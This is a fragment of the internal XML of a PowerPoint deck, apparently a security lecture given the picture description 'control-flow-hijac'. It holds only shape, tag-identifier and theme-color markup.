          <p:cNvPr id="7" name="Picture 6" descr="control-flow-hijac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65532"/>
            <a:ext cx="9144000" cy="4243294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="3505200"/>
            <a:ext cx="6324600" cy="2362200"/>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nchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFE"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18023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Cryptography</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747839D-A323-47F3-909F-548499399628}"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41953447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10.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100.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101.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102.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103.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104.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105.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106.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107.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108.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109.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11.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110.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111.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112.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113.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114.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115.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116.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117.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118.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119.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12.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120.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121.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122.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123.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124.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125.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126.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127.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128.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129.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13.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130.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131.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="Y0V1Wiyq8TI2mgrCoimzhq"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag132.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSECTIONID" val="rIEdv18DG593JvVXcctEip"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag14.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15.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16.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17.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18.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19.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2.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20.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21.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22.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23.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24.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25.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26.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27.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28.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29.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3.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30.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31.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32.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33.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34.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ags/tag35.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="ABDXY5xaURne6gJoWDgm0r"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag36.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="S2BtRPCaIjobNfIzphGORe"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag37.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="pRmUTP9kjiP9IBlueIyK93"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag38.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="PVstFmeZFbADCK7WVM1n06"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag39.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="lEw7eV3Yf65l1rspaM6kCE"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.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40.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="z4ZAniMMJL3JzNWx8jWGWt"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag41.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="ygJGtwBehFtG5s8EyLctmk"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag42.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="hhREtCENoVH5wIQHOgavto"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag43.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="fTIuptKbut6eYrOP3ZAuhy"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag44.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="YZVqNQWWiRQT1YWYca2dre"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag45.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="YhJpSYcbVZ7HUIyZGTeyaf"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag46.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="o5pQS4Mpr36K1EGnYXJ7WQ"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag47.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Mk4dpdt8ZS4JTEZ268ovx3"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag48.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="A9HUjiVgO3ixj5MFEzWj4d"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag49.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="GhL2oWRBIriIJUwvUadJ40"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.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50.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="rllUgrtPzeZmtp9hUZodlQ"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag51.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="eAmR89EL5l9FQpGuGq7SR3"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag52.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Jmq6mDfekQFA6KxoijaO8D"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag53.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="dNzJAqiX5sYaQ0q1N1vR0j"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag54.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="0giWWh8NI3U59CxC3PVnKd"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag55.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="BWTxXgw8ihDTNirDu1PiJV"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag56.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="fLQOtaYFWDyNEm2okRhzLD"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag57.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="rfPebplUxstGG8G9MlaCk0"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag58.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="l0E4A5GY0a9CjBYfZzk255"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag59.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="jYGUHa4Vo8jrTPA6Ofdzri"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.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60.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="w3O5axlBhiUfGFoGnvT5L1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag61.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="jSH9ETK5OwD1sC6C0wzNQ0"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag62.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="wE9VI8RHFmxuKWn0TsQcto"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag63.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="BFdLAKvmvXail30JaCd7Qh"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag64.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="tXR9fZD7XEx72tHWx6cjRz"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag65.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="ksAj0ahdYmykbgTqvvJoZw"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag66.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="QaEgROsvYJr9WlM1wRei0f"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag67.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Eo2HWuJV9V0smEon833pS8"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag68.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Gqvo4Ium2FZAvgeaSXL2Av"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag69.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="8tY7C9JbeBmvHCbxp1qMTk"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.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0.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="tM879Xa5DQyah1pW5lDQqn"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag71.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="dZyBZkxJBNCN0cZvZL09Xw"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag72.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Xxl98tW482U5y9yxXQxUeK"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag73.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74.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75.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="ER6xg7Dt6H5Yz7z7DT3FGn"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag76.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="oP2pIhzqOomffMJobGx7WB"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag77.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="7Zh0mnJPcxXhtguRpmTGSG"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag78.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="BkSMneHn7yrNI37IUbHZbP"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag79.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="iYisUkgadgIqnX8zZu7Ppp"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="yt1cXzmRPhqG21gPc4NxFz"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag80.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="PFyrKHrIYTvM1UtVkn7Xkb"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag81.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="5iF9AlbcRmpT8DUszyJvhO"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag82.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="VBWe54aJHs4EAfMB75wL18"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag83.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="m8LQ0RNyeOUgm4dmg727FX"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag84.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Ot2EGYrDYvMNeOse3jW8eg"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag85.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="KjTHnLPpJTtpjhOmaO7APo"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag86.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="uzPoT13JbwJyJILYBGNzMS"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag87.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="jPuaqH871DqlPjSYRNl0IW"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag88.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="FLy5AbdqNgCBf0UJBmA3u6"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag89.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="8nSs6CO0dMam9JBk6XUBQ9"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="TUDQWsNaB3icYR7VvmIgcD"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag90.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Je3R47cZpEszDac84BBM3Q"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag91.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="rTRa7ggC9TgYEEpfxHOdmv"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag92.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="Uz6r8XTiZ36SNaZT0VJNvz"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag93.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="jFvyJO4UYPuVYh4G8iJQUc"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag94.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="FaDbSJvOQYWtWxGbyfln2P"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag95.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="XdmHq0BQ1hpzXQZzFl9NZa"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag96.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="DT3wRDPQI7iQcqObivc0XF"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag97.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="4mzPbYz0efPNzsEU8Y1bzh"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag98.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="h7EzKt2EAZdYPGW2rQgHT3"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag99.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="DVSHAPEID" val="1oQmxoneZL6N5saCe5YAEQ"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="template">
  <a:themeElements>
    <a:clrScheme name="DBrumley201205 1">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="990000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E3E1E1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="990000"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E47932"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00709E"/>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28575" cap="rnd" cmpd="sng">
          <a:noFill/>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </a:spPr>
      <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
        <a:noAutofit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr sz="24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28575" cap="rnd" cmpd="sng">
